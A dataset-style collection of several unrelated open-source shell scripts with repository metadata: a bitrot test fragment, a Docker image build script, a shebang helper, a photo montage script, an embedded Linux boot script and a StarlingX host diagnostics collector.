dd seek=1k if=/dev/urandom of="$dest" bs=1k count=$((count*percent/100)) conv=notrunc &>/dev/null
touch "$dest" -r $temp
\rm -f $tmp
run $r "$dir_base"
}
generate_bitrots() {
local dest=$1 dest2=$2 temp=/tmp/temp-base
local -i count=$(($3*100)) percent=${4:-5}
mkdir -p "${dest%/*}"
mkdir -p "${dest2%/*}"
local dir_base=${dest%/*}
local dir_base2=${dest2%/*}
touch "$dest2" "$dest" $temp
#let's make sure they shared the same timestamp
touch "$dest" -r $temp
touch "$dest2" -r $temp
dd if=/dev/zero of="$dest" bs=1k count=$count &>/dev/null
dd if=/dev/zero of="$dest2" bs=1k count=$count &>/dev/null
run $r "$dir_base" "$dir_base2"
#modify it and change modify date to base-file, simulate bitrot so
dd seek=1k if=/dev/urandom of="$dest" bs=1k count=$((count*percent/100)) conv=notrunc &>/dev/null
dd seek=1k if=/dev/urandom of="$dest2" bs=1k count=$((count*percent/100)) conv=notrunc &>/dev/null
touch "$dest" -r $temp
touch "$dest2" -r $temp
\rm -f $tmp
echo $status > /tmp/status
run $r "$dir_base" "$dir_base2"
echo $status >> /tmp/status
}
| true |
98e7eedd9071c1654c3e06dfc1d2483be739b186 | Shell | fourjs-oe/genero_gas_centos_docker | /docker_build_genero_image.sh | UTF-8 | 1,594 | 3.796875 | 4 | [] | no_license | #!/usr/bin/env bash
fail()
{
echo "$@"
exit 1
}
# Docker image name
GENERO_DOCKER_IMAGE=${GENERO_DOCKER_IMAGE:-genero}
# Defaults
HOST_APACHE_PORT=${HOST_APACHE_PORT:-8080}
##### Apache file where passwords will be stored
APACHE_AUTH_FILE=${APACHE_AUTH_FILE:-apache-auth}
##### gasadmin user password for apache
GASADMIN_PASSWD=${GASADMIN_PASSWD:-gasadmin}
##### Provide ROOT_URL_PREFIX base on HOST_APACHE_PORT
ROOT_URL_PREFIX=http://localhost:${HOST_APACHE_PORT}/gas
##### FGLGWS package
FGLGWS_PACKAGE=${FGLGWS_PACKAGE:-$(ls -tr fjs-fglgws-*l64xl212.run | tail -n 1)}
##### GAS package
GAS_PACKAGE=${GAS_PACKAGE:-$(ls -tr fjs-gas-*l64xl212.run | tail -n 1)}
##### Ensure packages to install are provided.
[ -z "${FGLGWS_PACKAGE}" ] && fail "No fglgws package provided. FGLGWS_PACKAGE environment variable is missing."
[ -z "${GAS_PACKAGE}" ] && fail "No gas package provided. GAS_PACKAGE environment variable is missing."
cp ${FGLGWS_PACKAGE} fglgws-install.run || fail "Failed to copy ${FGLGWS_PACKAGE} to ./fglgws-install.run"
cp ${GAS_PACKAGE} gas-install.run || fail "Failed to copy ${GAS_PACKAGE} to ./fglgws-install.run"
##### Generate the password file
htpasswd -cb apache-auth gasadmin ${GASADMIN_PASSWD}
##### Build the Genero GAS image
docker build --pull --force-rm --build-arg FGLGWS_PACKAGE=fglgws-install.run \
--build-arg GAS_PACKAGE=gas-install.run \
--build-arg ROOT_URL_PREFIX=${ROOT_URL_PREFIX} \
--build-arg APACHE_AUTH_FILE=${APACHE_AUTH_FILE} \
-t ${GENERO_DOCKER_IMAGE} .
rm -f fglgws-install.run gas-install.run
| true |
5058424bae30e9a505c6ebbdeb4eb92053133e87 | Shell | fnivek/Scripts | /shebang | UTF-8 | 754 | 4.28125 | 4 | [] | no_license | #!/bin/bash
print_usage () {
printf "Usage: $0 [options] file\n\t-p python\n\t-s sh\n\t-b bash\n\t-h help\n"
exit 0
}
# Parse options
while getopts :psb opt; do
case $opt in
p)
p=${OPTARG}
;;
s)
s=${OPTARG}
;;
b)
b=${OPTARG}
;;
*)
print_usage
;;
esac
done
# Parse file
if [[ $(($# - $OPTIND)) -lt 0 ]]; then
# No file passed
echo "No file passed"
print_usage
fi
f=${@:OPTIND:1}
if [ ! -f $f ]; then
echo "$f is not a file"
print_usage
fi
shebang="#!/usr/bin/env python"
if ! [[ -z ${s+x} ]]; then
shebang="#!/bin/sh"
elif ! [[ -z ${b+x} ]]; then
shebang="#!/bin/bash"
fi
num_lines="$(cat $f | wc -l)" 2> /dev/null
if [ ${num_lines} -eq 0 ]; then
echo ${shebang} >> $f
exit 0
fi
sed -i "1 i${shebang}" $f
| true |
891626ed87a6950d7071a8aa814118120d9beaea | Shell | jbuchbinder/gophotobooth | /photobooth-montage.sh | UTF-8 | 861 | 3.5625 | 4 | [] | no_license | #!/bin/bash
# photobooth-montage.sh
# @jbuchbinder
#
# Create a photobooth-style montage of the four photos created by gophotobooth.
# Specify list of directories (without ending slashes) to create photobooth
# composites.
#
# Requires:
# - imagemagick's 'montage' utility
# - dcraw
SIZE=1000
EXT="CR2"
for dir in $*; do
d=${dir//\/}
if [ ! -f ${d}-photobooth.jpg ]; then
REMOVELIST=""
FILES=""
for f in $d/*.${EXT}; do
BN=$( basename "$f" )
dcraw -e $f
mv ${f//.$EXT}.thumb.jpg /tmp/${BN//.$EXT}.thumb.jpg
REMOVELIST="$REMOVELIST /tmp/${BN//.$EXT}.thumb.jpg"
FILES="$FILES /tmp/${BN//.$EXT}.thumb.jpg"
done
montage -verbose -label '' \
-font Ubuntu -pointsize 32 \
-background '#000000' -fill 'gray' -define jpeg:size=${SIZE}x${SIZE} \
-geometry ${SIZE}x${SIZE}+2+2 -auto-orient $FILES ${d}-photobooth.jpg
rm -f $REMOVELIST
fi
done
| true |
a7bc0df21e7b66eb79fc870908fd9508b8b96bfe | Shell | andriykutsevol/Linux-Buildroot-ARM | /files_patch/etc/init.d/sysfs.sh | UTF-8 | 7,450 | 3.359375 | 3 | [] | no_license | #!/bin/sh
#echo "We are: $0 : $1"
if [ -e /proc ] && ! [ -e /proc/mounts ]; then
mount -t proc proc /proc
#echo " mount -t proc proc /proc"
fi
if [ -e /sys ] && ! [ -e /sys/kernel ] && grep -q sysfs /proc/filesystems; then
mount sysfs /sys -t sysfs
#echo " mount sysfs /sys -t sysfs"
fi
#echo " From sysfs.h"
#if [ -d /sys/class ]; then echo "/sys/class OK"; fi
#if [ -d /sys/class/gpio ]; then echo "/sys/class/gpio OK"; fi
#if [ -d /sys/class/gpio/gpio76 ]; then echo "/sys/class/gpio/gpio76 OK"; fi
#if [ -f /sys/class/gpio/gpio76/value ]; then echo "/sys/class/gpio/gpio76/value OK"; fi
#echo "From sysfs.h"
mount -t devtmpfs devtmpfs /dev
mkdir -m 0755 /dev/pts
mkdir -m 1777 /dev/shm
mount -a
if [ ! -e "/lib/modules/$(uname -r)"/modules.dep ] ; then
#echo " mkdir -p /lib/modules/uname"
mkdir -p /lib/modules/$(uname -r)
# depmod not install yet
# see http://buildroot.uclibc.org/downloads/manual/manual.html -- /dev managenemt
#depmod -ae
fi
#---------------------------------------
# md5
#if [ ! -b /dev/mmcblk0p4 ]; then
# echo "error: ! -b /dev/mmcblk0p4 " >> /etc/immed_reboot
# echo "system will be reboted"
# exit 1
#
#else
# mount /dev/mmcblk0p4 /mnt/f
# ln -s /mnt/f /root/f
#fi
#---------------------------------------
# logs
mkdir /mnt/D/usr
mkdir /mnt/D/usr/bin
mkdir /mnt/D/usr/bin/Demetro
touch /mnt/D/usr/bin/Demetro/stat.txt
touch /mnt/D/usr/bin/Demetro/errorlog.log
touch /mnt/D/usr/bin/Demetro/nmea_emul_flag.txt
# configs
if [ ! -b /dev/mmcblk0p2 ]; then
echo "Warning: Using default settings."
else
mount /dev/mmcblk0p2 /mnt/D
ln -s /mnt/D /root/D
ln -s /ftpdir /mnt/D/ftpdir
fi
# updates
if [ ! -b /dev/mmcblk0p3 ]; then
echo "Warning: Update is imposible."
else
mount /dev/mmcblk0p3 /mnt/E
ln -s /mnt/E /root/E
fi
# # #---------------------------------------
# #
# # #---------------------------------------
# # #---------- MD5SUM mmc C: ------------
# # #---------------------------------------
# #
# # if [ ! -f /mnt/D/md5sums/mmc-c.hash ]; then
# #
# # echo "ERROR /mnt/D/md5sums/fmmc-c.hash DOES NOT EXIST"
# # echo "ERROR: Check sum will not be calculated"
# # read -p "Continue without /mnt/D/md5sums/fmmc-c.hash file? (y):" crc_file
# # if [ ! "$crc_file" = 'y' ];then
# # echo "/mnt/D/md5sums/fmmc-c.hash DOES NOT EXIST" >> /etc/immed_reboot
# # echo "System will be reboted"
# # fi
# # else
# # sh /etc/init.d/md5_check.sh /dev/mmcblk0p1 all /mnt/D/md5sums/mmc-c.hash &
# # fi
# #
# #
# # #---------------------------------------
# # #---------- MD5SUM ------------------
# # #---------------------------------------
# #
# # if [ ! -f /mnt/D/md5sums/mtd1 ]; then
# #
# # echo "ERROR /mnt/D/md5sums/mtd1 DOES NOT EXIST"
# # echo "ERROR: Check sum will not be calculated"
# # read -p "Continue without /mnt/D/md5sums/mtd1 file? (y):" crc_file
# # if [ ! "$crc_file" = 'y' ];then
# # echo "/mnt/D/md5sums/mtd1 DOES NOT EXIST" >> /etc/immed_reboot
# # echo "System will be reboted"
# # fi
# # else
# # sh /etc/init.d/md5_check.sh /dev/mtd1 all /mnt/D/md5sums/mtd1 &
# # fi
# #
# # #---------------------------------------
# #
# # if [ ! -f /mnt/D/md5sums/mtd2 ]; then
# #
# # echo "ERROR /mnt/D/md5sums/mtd2 DOES NOT EXIST"
# # echo "ERROR: Check sum will not be calculated"
# # read -p "Continue without /mnt/D/md5sums/mtd2 file? (y):" crc_file
# # if [ ! "$crc_file" = 'y' ];then
# # echo "/mnt/D/md5sums/mtd2 DOES NOT EXIST" > /etc/immed_reboot
# # echo "System will be reboted"
# # fi
# # else
# # sh /etc/init.d/md5_check.sh /dev/mtd2 all /mnt/D/md5sums/mtd2 &
# # fi
# #
# #
# # #---------------------------------------
# #
# # if [ ! -f /mnt/D/md5sums/mtd3 ]; then
# #
# # echo "ERROR /mnt/D/md5sums/mtd4 DOES NOT EXIST"
# # echo "ERROR: Check sum will not be calculated"
# # read -p "Continue without /mnt/D/md5sums/mtd3 file? (y):" crc_file
# # if [ ! "$crc_file" = 'y' ];then
# # echo "/mnt/D/md5sums/mtd3 DOES NOT EXIST" > /etc/immed_reboot
# # echo "System will be reboted"
# # fi
# # else
# # sh /etc/init.d/md5_check.sh /dev/mtd3 all /mnt/D/md5sums/mtd3 &
# # fi
# #
# # #---------------------------------------
# #
# # #---------------------------------------
# #
# # if [ ! -f /mnt/D/md5sums/mtd4 ]; then
# #
# # echo "ERROR /mnt/D/md5sums/mtd4 DOES NOT EXIST"
# # echo "ERROR: Check sum will not be calculated"
# # read -p "Continue without /mnt/D/md5sums/mtd4 file? (y):" crc_file
# # if [ ! "$crc_file" = 'y' ];then
# # echo "/mnt/D/md5sums/mtd4 DOES NOT EXIST" > /etc/immed_reboot
# # echo "System will be reboted"
# # fi
# # else
# # sh /etc/init.d/md5_check.sh /dev/mtd4 40960 /mnt/D/md5sums/mtd4 & # size in KB
# # fi
#---------------------------------------
#--------- Configs -------------------
#---------------------------------------
# First remove configs.
rm /etc/ntp.conf 2> /dev/null
rm /etc/resolv.conf 2> /dev/null
rm /etc/vsftpd.conf 2> /dev/null
rm /etc/network/interfaces 2> /dev/null
rm /usr/bin/Demetro/boot.cfg 2> /dev/null
rm /usr/bin/Demetro/enable.cfg 2> /dev/null
# Then check configs on D:
if [ ! -f /mnt/D/etc/ntp.conf ]; then
echo "ERROR: /mnt/D/etc/ntp.conf DOES NOT EXIST"
echo "System will be reboted"
echo "/mnt/D/etc/ntp.conf DOES NOT EXIST" >> /etc/immed_reboot
fi
if [ ! -f /mnt/D/etc/resolv.conf ]; then
echo "ERROR: /mnt/D/etc/resolv.conf DOES NOT EXIST"
echo "System will be reboted"
echo "/mnt/D/etc/resolv.conf DOES NOT EXIST" >> /etc/immed_reboot
fi
if [ ! -f /mnt/D/etc/network/interfaces ]; then
echo "ERROR: /mnt/D/etc/network/interfaces DOES NOT EXIST"
echo "System will be reboted"
echo "/mnt/D/etc/network/interfaces DOES NOT EXIST" >> /etc/immed_reboot
fi
if [ ! -f /mnt/D/etc/vsftpd.conf ]; then
echo "ERROR: /mnt/D/etc/vsftpd.conf DOES NOT EXIST"
echo "System will be reboted"
echo "/mnt/D/etc/vsftpd.conf DOES NOT EXIST" >> /etc/immed_reboot
fi
if [ ! -f /mnt/D/usr/bin/Demetro/boot.cfg ]; then
echo "ERROR: /mnt/D/usr/bin/Demetro/boot.cfg DOES NOT EXIST"
echo "System will be reboted"
echo "/mnt/D/usr/bin/Demetro/boot.cfg DOES NOT EXIST" >> /etc/immed_reboot
fi
if [ ! -f /mnt/D/usr/bin/Demetro/boot.cfg ]; then
echo "ERROR: /mnt/D/usr/bin/Demetro/boot.cfg DOES NOT EXIST"
echo "System will be reboted"
echo "/mnt/D/usr/bin/Demetro/boot.cfg DOES NOT EXIST" >> /etc/immed_reboot
fi
if [ ! -f /mnt/D/usr/bin/Demetro/enable.cfg ]; then
echo "ERROR: /mnt/D/usr/bin/Demetro/enable.cfg DOES NOT EXIST"
echo "System will be reboted"
echo "/mnt/D/usr/bin/Demetro/enable.cfg DOES NOT EXIST" >> /etc/immed_reboot
fi
# And now create the links
ln -s /mnt/D/etc/ntp.conf /etc/ntp.conf
ln -s /mnt/D/etc/resolv.conf /etc/resolv.conf
ln -s /mnt/D/etc/network/interfaces /etc/network/interfaces
ln -s /mnt/D/etc/vsftpd.conf /etc/vsftpd.conf
ln -s /mnt/D/usr/bin/Demetro/boot.cfg /usr/bin/Demetro/boot.cfg
ln -s /mnt/D/usr/bin/Demetro/enable.cfg /usr/bin/Demetro/enable.cfg
ln -s /dev/rtc0 /dev/rtc
ln -s /dev/ttyO0 /dev/gps0
ln -s /dev/pps0 /dev/gpspps0
#---------------------------------------
exit 0
#!/bin/bash
# mountpoint -q $1
# if [ $? == 0 ]
# then
# echo "$1 is a mountpoint"
# else
# echo "$1 is not a mountpoint"
# fi
#-----------------------
# if mountpoint -q $1; then
# echo "$1 is a mountpoint"
# else
# echo "$1 is not a mountpoint"
# fi
| true |
897a82624795d4b391b0fe957d2823de59a68f5d | Shell | orenlivne/ober | /primal/src/system/bin/to-unix-path | UTF-8 | 140 | 3.4375 | 3 | [] | no_license | #!/bin/bash
# Convert a Windows path to a Unix Path. Useful on Cygwin.
if [ $OSTYPE == 'cygwin' ]; then
cygpath -w $1
else
echo $1
fi
| true |
77b1cde0c080ad70fad6a9ed7437dd7ffbb374c4 | Shell | starlingx/utilities | /tools/collector/scripts/collect_host | UTF-8 | 16,659 | 3.390625 | 3 | [
"Apache-2.0"
] | permissive | #! /bin/bash
########################################################################
#
# Copyright (c) 2016-2021 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
########################################################################
# make these platform.conf variables global.
# values are loaded in source_openrc_if_needed.
export nodetype=""
export subfunction=""
export system_type=""
export security_profile=""
export sdn_enabled=""
export region_config=""
export vswitch_type=""
export system_mode=""
export sw_version=""
# assume this is not the active controller until learned
export ACTIVE=false
#
# Import commands, variables and convenience functions available to
# all collectors ; common and user defined.
#
source /usr/local/sbin/collect_utils
source_openrc_if_needed
#
# parse input parameters
#
COLLECT_NAME="${1}"
DEBUG=${8}
INVENTORY=${9}
set_debug_mode ${DEBUG}
# Calling parms
#
# 1 = collect name
# 2 = start date option
# 3 = start date
# 4 = "any" (ignored - no longer used ; kept to support upgrades/downgrades)
# 5 = end date option
# 6 = end date
# 7 = "any" (ignored - no longer used ; kept to support upgrades/downgrades)
# 8 = debug mode
# 9 = inventory
logger -t ${COLLECT_TAG} "${0} ${1} ${2} ${3} ${4} ${5} ${6} ${7} ${8} ${9}"
# parse out the start data/time data if it is present
STARTDATE_RANGE=false
STARTDATE="any"
if [ "${2}" == "${STARTDATE_OPTION}" ] ; then
if [ "${3}" != "any" -a ${#3} -gt 7 ] ; then
STARTDATE_RANGE=true
STARTDATE="${3}"
fi
fi
# parse out the end date/time if it is present
ENDDATE_RANGE=false
ENDDATE="any"
if [ "${5}" == "${ENDDATE_OPTION}" ] ; then
if [ "${6}" != "any" -a ${#6} -gt 7 ] ; then
ENDDATE_RANGE=true
ENDDATE="${6}"
fi
fi
COLLECT_BASE_DIR="/scratch"
EXTRA="var/extra"
hostname="${HOSTNAME}"
COLLECT_NAME_DIR="${COLLECT_BASE_DIR}/${COLLECT_NAME}"
EXTRA_DIR="${COLLECT_NAME_DIR}/${EXTRA}"
TARBALL="${COLLECT_NAME_DIR}.tgz"
COLLECT_PATH="/etc/collect.d"
RUN_EXCLUDE="/etc/collect/run.exclude"
ETC_EXCLUDE="/etc/collect/etc.exclude"
VAR_LOG_EXCLUDE="/etc/collect/varlog.exclude"
COLLECT_INCLUDE="/var/run /etc /root"
FLIGHT_RECORDER_PATH="var/lib/sm/"
FLIGHT_RECORDER_FILE="sm.eru.v1"
VAR_LOG_INCLUDE_LIST="/tmp/${COLLECT_NAME}.lst"
COLLECT_DIR_USAGE_CMD="df -h ${COLLECT_BASE_DIR}"
COLLECT_DATE="/usr/local/sbin/collect_date"
COLLECT_SYSINV="${COLLECT_PATH}/collect_sysinv"
function log_space()
{
local msg=${1}
space="`${COLLECT_DIR_USAGE_CMD}`"
space1=`echo "${space}" | grep -v Filesystem`
ilog "${COLLECT_BASE_DIR} ${msg} ${space1}"
}
space_precheck ${HOSTNAME} ${COLLECT_BASE_DIR}
CURR_DIR=`pwd`
mkdir -p ${COLLECT_NAME_DIR}
cd ${COLLECT_NAME_DIR}
# create dump target extra-stuff directory
mkdir -p ${EXTRA_DIR}
RETVAL=0
# Remove any previous collect error log.
# Start this collect with an empty file.
#
# stderr is directed to this log during the collect process.
# By searching this log after collect_host is run we can find
# errors that occured during collect.
# The only real error that we care about right now is the
#
# "No space left on device" error
#
rm -f ${COLLECT_ERROR_LOG}
touch ${COLLECT_ERROR_LOG}
chmod 644 ${COLLECT_ERROR_LOG}
echo "`date '+%F %T'` :${COLLECT_NAME_DIR}" > ${COLLECT_ERROR_LOG}
ilog "creating local collect tarball ${COLLECT_NAME_DIR}.tgz"
################################################################################
# Run collect scripts to check system status
################################################################################
function collect_parts()
{
if [ -d ${COLLECT_PATH} ]; then
for i in ${COLLECT_PATH}/*; do
if [ -f $i ]; then
if [ ${i} = ${COLLECT_SYSINV} ]; then
$i ${COLLECT_NAME_DIR} ${EXTRA_DIR} ${hostname} ${INVENTORY}
else
$i ${COLLECT_NAME_DIR} ${EXTRA_DIR} ${hostname}
fi
fi
done
fi
}
function collect_extra()
{
# dump process lists
LOGFILE="${EXTRA_DIR}/process.info"
echo "${hostname}: Process Info ......: ${LOGFILE}"
delimiter ${LOGFILE} "ps -e -H -o ..."
${PROCESS_DETAIL_CMD} >> ${LOGFILE}
# Collect process and thread info (tree view)
delimiter ${LOGFILE} "pstree --arguments --ascii --long --show-pids"
pstree --arguments --ascii --long --show-pids >> ${LOGFILE}
# Collect process, thread and scheduling info (worker subfunction only)
# (also gets process 'affinity' which is useful on workers;
which ps-sched.sh >/dev/null 2>&1
if [ $? -eq 0 ]; then
delimiter ${LOGFILE} "ps-sched.sh"
ps-sched.sh >> ${LOGFILE}
fi
# Collect process, thread and scheduling, and elapsed time
# This has everything that ps-sched.sh does, except for cpu affinity mask,
# adds: stime,etime,time,wchan,tty).
delimiter ${LOGFILE} "ps -eL -o pid,lwp,ppid,state,class,nice,rtprio,priority,psr,stime,etime,time,wchan:16,tty,comm,command"
ps -eL -o pid,lwp,ppid,state,class,nice,rtprio,priority,psr,stime,etime,time,wchan:16,tty,comm,command >> ${LOGFILE}
# Collect per kubernetes container name, QoS, and cpusets per numa node
delimiter ${LOGFILE} "kube-cpusets"
kube-cpusets >> ${LOGFILE}
# Various host attributes
LOGFILE="${EXTRA_DIR}/host.info"
echo "${hostname}: Host Info .........: ${LOGFILE}"
# CGCS build info
delimiter ${LOGFILE} "${BUILD_INFO_CMD}"
${BUILD_INFO_CMD} >> ${LOGFILE}
delimiter ${LOGFILE} "uptime"
uptime >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
delimiter ${LOGFILE} "cat /proc/cmdline"
cat /proc/cmdline >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
delimiter ${LOGFILE} "cat /proc/version"
cat /proc/version >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
delimiter ${LOGFILE} "lscpu"
lscpu >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
delimiter ${LOGFILE} "lscpu -e"
lscpu -e >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
delimiter ${LOGFILE} "cat /proc/cpuinfo"
cat /proc/cpuinfo >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
delimiter ${LOGFILE} "cat /sys/devices/system/cpu/isolated"
cat /sys/devices/system/cpu/isolated >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
delimiter ${LOGFILE} "ip addr show"
ip addr show >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
delimiter ${LOGFILE} "lspci -nn"
lspci -nn >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
delimiter ${LOGFILE} "find /sys/kernel/iommu_groups/ -type l"
find /sys/kernel/iommu_groups/ -type l >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
# networking totals
delimiter ${LOGFILE} "cat /proc/net/dev"
cat /proc/net/dev >> ${LOGFILE}
delimiter ${LOGFILE} "dmidecode"
dmidecode >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
# summary of scheduler tunable settings
delimiter ${LOGFILE} "cat /proc/sched_debug | head -15"
cat /proc/sched_debug | head -15 >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
if [ "${SKIP_MASK}" = "true" ]; then
delimiter ${LOGFILE} "facter (excluding ssh info)"
facter | grep -iv '^ssh' >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
else
delimiter ${LOGFILE} "facter"
facter >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
fi
if [[ "$nodetype" == "worker" || "$subfunction" == *"worker"* ]] ; then
delimiter ${LOGFILE} "topology"
topology >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
fi
LOGFILE="${EXTRA_DIR}/memory.info"
echo "${hostname}: Memory Info .......: ${LOGFILE}"
delimiter ${LOGFILE} "cat /proc/meminfo"
cat /proc/meminfo >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
delimiter ${LOGFILE} "cat /sys/devices/system/node/node?/meminfo"
cat /sys/devices/system/node/node?/meminfo >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
delimiter ${LOGFILE} "cat /proc/slabinfo"
log_slabinfo ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
delimiter ${LOGFILE} "ps -e -o ppid,pid,nlwp,rss:10,vsz:10,cmd --sort=-rss"
ps -e -o ppid,pid,nlwp,rss:10,vsz:10,cmd --sort=-rss >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
# list open files
delimiter ${LOGFILE} "lsof -lwX"
lsof -lwX >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
# hugepages numa mapping
delimiter ${LOGFILE} "grep huge /proc/*/numa_maps"
grep -e " huge " /proc/*/numa_maps >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
# rootfs and tmpfs usage
delimiter ${LOGFILE} "df -h -H -T --local -t rootfs -t tmpfs"
df -h -H -T --local -t rootfs -t tmpfs >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
LOGFILE="${EXTRA_DIR}/filesystem.info"
echo "${hostname}: Filesystem Info ...: ${LOGFILE}"
# disk inodes usage
delimiter ${LOGFILE} "df -h -H -T --local -t rootfs -t tmpfs"
df -h -H -T --local -t rootfs -t tmpfs >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
# disk space usage
delimiter ${LOGFILE} "df -h -H -T --local -t ext2 -t ext3 -t ext4 -t xfs --total"
df -h -H -T --local -t ext2 -t ext3 -t ext4 -t xfs --total >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
# disk inodes usage
delimiter ${LOGFILE} "df -h -H -T --local -i -t ext2 -t ext3 -t ext4 -t xfs --total"
df -h -H -T --local -i -t ext2 -t ext3 -t ext4 -t xfs --total >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
# disks by-path values
delimiter ${LOGFILE} "ls -lR /dev/disk"
ls -lR /dev/disk >> ${LOGFILE}
# disk summary (requires sudo/root)
delimiter ${LOGFILE} "fdisk -l"
fdisk -l >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
delimiter ${LOGFILE} "cat /proc/scsi/scsi"
cat /proc/scsi/scsi >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
# Controller specific stuff
if [ "$nodetype" = "controller" ] ; then
delimiter ${LOGFILE} "cat /proc/drbd"
cat /proc/drbd >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
delimiter ${LOGFILE} "/sbin/drbdadm dump"
/sbin/drbdadm dump >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
fi
# LVM summary
delimiter ${LOGFILE} "/usr/sbin/vgs --version ; /usr/sbin/pvs --version ; /usr/sbin/lvs --version"
/usr/sbin/vgs --version >> ${LOGFILE}
/usr/sbin/pvs --version >> ${LOGFILE}
/usr/sbin/lvs --version >> ${LOGFILE}
delimiter ${LOGFILE} "/usr/sbin/vgs --all --options all"
/usr/sbin/vgs --all --options all >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
delimiter ${LOGFILE} "/usr/sbin/pvs --all --options all"
/usr/sbin/pvs --all --options all >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
delimiter ${LOGFILE} "/usr/sbin/lvs --all --options all"
/usr/sbin/lvs --all --options all >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
# iSCSI Information
LOGFILE="${EXTRA_DIR}/iscsi.info"
echo "${hostname}: iSCSI Information ......: ${LOGFILE}"
if [ "$nodetype" = "controller" ] ; then
# Controller- LIO exported initiators summary
delimiter ${LOGFILE} "targetcli ls"
targetcli ls >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
# Controller - LIO sessions
delimiter ${LOGFILE} "targetcli sessions detail"
targetcli sessions detail >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
elif [[ "$nodetype" == "worker" || "$subfunction" == *"worker"* ]] ; then
# Worker - iSCSI initiator information
collect_dir=${EXTRA_DIR}/iscsi_initiator_info
mkdir -p ${collect_dir}
cp -rf /run/iscsi-cache/nodes/* ${collect_dir}
find ${collect_dir} -type d -exec chmod 750 {} \;
# Worker - iSCSI initiator active sessions
delimiter ${LOGFILE} "iscsiadm -m session"
iscsiadm -m session >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
# Worker - iSCSI udev created nodes
delimiter ${LOGFILE} "ls -la /dev/disk/by-path | grep \"iqn\""
ls -la /dev/disk/by-path | grep "iqn" >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
fi
LOGFILE="${EXTRA_DIR}/history.info"
echo "${hostname}: Bash History ......: ${LOGFILE}"
# history
delimiter ${LOGFILE} "cat /home/sysadmin/.bash_history"
cat /home/sysadmin/.bash_history >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
LOGFILE="${EXTRA_DIR}/interrupt.info"
echo "${hostname}: Interrupt Info ....: ${LOGFILE}"
# interrupts
delimiter ${LOGFILE} "cat /proc/interrupts"
cat /proc/interrupts >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
delimiter ${LOGFILE} "cat /proc/softirqs"
cat /proc/softirqs >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
# Controller specific stuff
if [ "$nodetype" = "controller" ] ; then
netstat -pan > ${EXTRA_DIR}/netstat.info
fi
LOGFILE="${EXTRA_DIR}/blockdev.info"
echo "${hostname}: Block Devices Info : ${LOGFILE}"
# Collect block devices - show all sda and cinder devices, and size
delimiter ${LOGFILE} "lsblk"
lsblk >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
# Collect block device topology - show devices and which io-scheduler
delimiter ${LOGFILE} "lsblk --topology"
lsblk --topology >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
# Collect SCSI devices - show devices and cinder attaches, etc
delimiter ${LOGFILE} "lsblk --scsi"
lsblk --scsi >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
}
log_space "before collect ......:"
collect_extra
collect_parts
#
# handle collect collect-after and collect-range and then
# in elif clause collect-before
#
VAR_LOG="/var/log"
if [ -e /www/var/log ]; then
VAR_LOG="$VAR_LOG /www/var/log"
fi
rm -f ${VAR_LOG_INCLUDE_LIST}
if [ "${STARTDATE_RANGE}" == true ] ; then
if [ "${ENDDATE_RANGE}" == false ] ; then
ilog "collecting $VAR_LOG files containing logs after ${STARTDATE}"
${COLLECT_DATE} ${STARTDATE} ${ENDDATE} ${VAR_LOG_INCLUDE_LIST} ${DEBUG} ""
else
ilog "collecting $VAR_LOG files containing logs between ${STARTDATE} and ${ENDDATE}"
${COLLECT_DATE} ${STARTDATE} ${ENDDATE} ${VAR_LOG_INCLUDE_LIST} ${DEBUG} ""
fi
elif [ "${ENDDATE_RANGE}" == true ] ; then
STARTDATE="20130101"
ilog "collecting $VAR_LOG files containing logs before ${ENDDATE}"
${COLLECT_DATE} ${STARTDATE} ${ENDDATE} ${VAR_LOG_INCLUDE_LIST} ${DEBUG} ""
else
ilog "collecting all of $VAR_LOG"
find $VAR_LOG ! -empty > ${VAR_LOG_INCLUDE_LIST}
fi
# Add VM console.log
for i in /var/lib/nova/instances/*/console.log; do
if [ -e "$i" ]; then
tmp=`dirname $i`
mkdir -p ${COLLECT_NAME_DIR}/$tmp
cp $i ${COLLECT_NAME_DIR}/$tmp
fi
done
log_space "before first tar ....:"
